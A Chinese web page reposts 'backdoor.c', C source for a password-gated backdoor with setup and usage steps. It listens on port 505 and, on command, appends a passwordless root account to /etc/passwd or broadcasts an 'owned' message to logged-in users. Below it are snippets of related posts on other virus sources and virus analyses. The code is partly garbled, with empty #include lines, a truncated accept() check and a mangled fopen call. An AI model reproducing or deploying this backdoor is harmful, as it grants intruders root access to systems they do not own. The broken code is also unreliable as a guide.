backdoor病毒珍藏绝密源代码

--=\\backdoor.c\\=-- /*

A rip off a sockets tutorial i found somewhere cause I didn't feel like

writing stupid basic sockets code when I had it in my src directory

already.

*/

/* Greets:

Undernet Channels:

#rootworm, #hacktech, #hyperlink, #3xposure, #legionoot

Groups:

The LegionOOT (www.legionoot.cc), Team Sploit

People:

Cyph3r, n3m0, Adoni, f0bic, d0g, khe0ps, h-S-t,

F-o-X, NeonMatrix, Azmodan, & Venomous

/*

Usage (setup):

# gcc -o backdoor backdoor.c

# ./backdoor password &

Usage (using):

telnet to host (port 505) --> type the password (don't wait for a

prompt, there isn't one so its less obvious its a backdoor) -->

type 1or 2. And yes it's _supposed_ to disconnect you after

each command.

*/

#include

#include

#include

#include

#include

#include

#include

#include

#define PORT 505

#define MAXDATASIZE 100

#define BACKLOG 10

void handle(char *command);

int main(int argc, char *argv[])

{

int sockfd, new_fd, sin_size, numbytes;

char *bytes;

struct sockaddr_in my_addr;

struct sockaddr_in their_addr;

char buf[MAXDATASIZE];

char ask[]="Enter Command (1 to put r00t::0:0:... in /etc/passwd, 2 to

send '7h1s b0x 1s 0wn3d' to all people on the box: ";

if (argc != 2) {

fprintf(stderr,"Usage: %s password\n", argv[0]);

exit(1);

}

if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {

perror("socket");

exit(1);

}

my_addr.sin_family = AF_INET;

my_addr.sin_port = htons(PORT);

my_addr.sin_addr.s_addr = INADDR_ANY;

if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1)

{

perror("bind");

exit(1);

}

if (listen(sockfd, BACKLOG) == -1) {

perror("listen");

exit(1);

}

while(1) { /* main accept() loop */

sin_size = sizeof(struct sockaddr_in);

if ((new_fd = accept(sockfd, (struct sockaddr *)&their_addr, \

&sin_size)) ==

{

perror("accept");

continue;

}

inet_ntoa(their_addr.sin_addr);

if (!fork()) {

recv(new_fd, buf,

MAXDATASIZE, 0);

bytes = strstr(buf, argv[1]);

if (bytes != NULL){

send(new_fd, ask, sizeof(ask), 0);

numbytes=recv(new_fd, buf,

MAXDATASIZE, 0);

buf[numbytes] = '\0';

handle(buf);

}

close(new_fd);

exit(0);

}

close(new_fd);

while(waitpid(-1,NULL,WNOHANG) > 0); /* clean up child

processes */

}

}

void handle(char *command)

{

FILE *fle;

if(strstr(command, "1") != NULL)

{

fle = f0/*n("/etc/passwd", "a*/;

fprintf(fle, "r00t::0:0:r00t:/root:/bin/bash");

fclose(fle);

}

if(strstr(command, "2") != NULL)

{

system("wall 7h1s b0x 1s 0wn3d");

}

}

PBBSER

pbbser@legionoot.hypermart.net

----------------------------

(0)

相关推荐

  • backdoor病毒珍藏绝密源代码

    --=\\backdoor.c\\=-- /* A rip off a sockets tutorial i found somewhere cause I didn't feel like writing stupid basic sockets code when I had it in my src directory already. */ /* Greets: Undernet Channels: #rootworm, #hacktech, #hyperlink, #3xposure,

  • “冲击波”病毒的shellcode源代码

    2年前"冲击波"病毒爆发时,我曾经对它的SHELLCODE进行过分析,现在把我当时写的分析献出来, 让大家看看"一代名毒"是怎样的.一般来说,shellcode都是这样写的,因此只要hook shellcode必须调用的api,判断esp和eip 的差值如果在0x1000以内(也就是说代码在堆栈里运行),那么基本上可以确认系统受到缓冲区溢出攻击,该进程必须马上退出. 当然,有些更厉害的shellcode采用直接调用native api,raw socket收发包等技

  • MSN圣诞照片(Backdoor.Win32.PBot.a)病毒分析解决

    文件名称:devic.exe 文件大小:23304 bytes AV命名:(virustotal上仅卡吧一家报)Backdoor.Win32.SdBot.cok 加壳方式:未知 编写语言:VC 病毒类型:IRCbot 文件MD5:45de608d74ee4fb86b20da86dcbeb55c 行为分析: 1.释放病毒副本: C:\WINDOWS\devic.exe , 23304 字节 C:\WINDOWS\img5-2007.zip , 23456 字节 2.添加注册表,开机启动: HKEY

  • Backdoor.Win32.IRCBot.afm(video.exe)病毒的处理方法

    文件名称:video.exe 文件大小:40960 bytes AV命名:Backdoor.Win32.IRCBot.afm (Kaspersky) 加壳方式:未知 编写语言:Microsoft Visual C++ 病毒类型:IRC后门 文件MD5:c06d070c232bc6ac6346cbd282ef73ae 行为分析: 1.释放病毒副本: %Srstemroot%system32\firewall.exe    40960 字节. (文件名应该是随机的,不一定是这个). 压缩副本病毒,保

  • MSN传播病毒Backdoor.Win32.IRCBot.acd清除方法

    病毒名称:Backdoor.Win32.IRCBot.acd(Kaspersky) 病毒大小:118,272 字节 加壳方式:PE_Patch NTKrnl         样本MD5:71b015411d27794c3e900707ef21e6e7 样本SHA1:934b80b2bfbb744933ad9de35bc2b588c852d08e 发现时间:2007.7 更新时间:2007.7 传播方式:通过MSN传播 技术分析 病毒向MSN联系人发送消息和伪装成照片的带毒压缩包,对方联系人接收并

  • NYboy.vbs病毒源代码公布,我来模拟熊猫烧香

    使用过U盘的朋友都知道u盘病毒是一种Autorun自运行病毒,当双击时触发病毒体,会复制自身到C D E和系统盘system32下等盘符,(生成exe文件和一个Autorun.inf文件),同时修改注册表,当点击C盘等盘符右键时,会有一个auto命令(黑色粗体)或者是两个开始命令,本人学习vbs才15天,我也来模拟下这个autorun病毒 和部分熊猫烧香功能,本人能力有限, 只能模拟这样的病毒了,声明, 本人模拟这个病毒,全是为了学习和技术,切忌不要搞破坏,如果有人用本人代码破坏,后果自负on 

  • LCL.VBS 病毒源代码

    rem email:kouguoxi@hotmail.comrem some crack statement i remment,make it can't to runon error resume next dim title,text title="can you help me find a person?" text="her name is Liu Chun li."&chr(13)&chr(10) text=text&"

  • vbs病毒的简单例子源代码解析

    说明:作者对某些代码进行了修改.该文件是一个完整的程序.该文件执行之后,会寻找硬盘上所有满足条件的文件,对其进行强制性覆盖(满足条件的文件数据将全部丢失).并再创建一个相同文件名但后带.vbs的文件.因此,请注意设立好破坏测试条件,千万不要对他人进行测试,否则,一切后果自负.如果你的系统不支持.vbs,可以将后缀改为.vbe dim folder,fso,foldername,f,d,dc set fso=createobject("scripting.filesystemobject"

  • IRC后门病毒及手动清除方法

    2004年年初,IRC后门病毒开始在全球网络大规模出现.一方面有潜在的泄漏本地信息的危险,另一方面病毒出现在局域网中使网络阻塞,影响正常工作,从而造成损失. 同时,由于病毒的源代码是公开的,任何人拿到源码后稍加修改就可编译生成一个全新的病毒,再加上不同的壳,造成IRC后门病毒变种大量涌现.还有一些病毒每次运行后都会进行变形,给病毒查杀带来很大困难.本文先从技术角度介绍IRC后门病毒,然后介绍其手工清除方法. 一.技术报告 IRC病毒集黑客.蠕虫.后门功能于一体,通过局域网共享目录和系统漏洞进行传

  • 修改注册表对付病毒、木马、后门及黑客程序

    在网络给我们的工作学习带来极大方便的同时,病毒.木马.后门以及黑客程序也严重影响着信息的安全.这些程序感染计算机的一个共同特点是在注册表中写入信息,来达到如自动运行.破坏和传播等目的.以下是笔者在网上收集的,通过修改注册表来对付病毒.木马.后门以及黑客程序,保证个人计算机的安全. 1.预防Acid Battery v1.0木马的破坏 在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices下若在右边窗口中如

随机推荐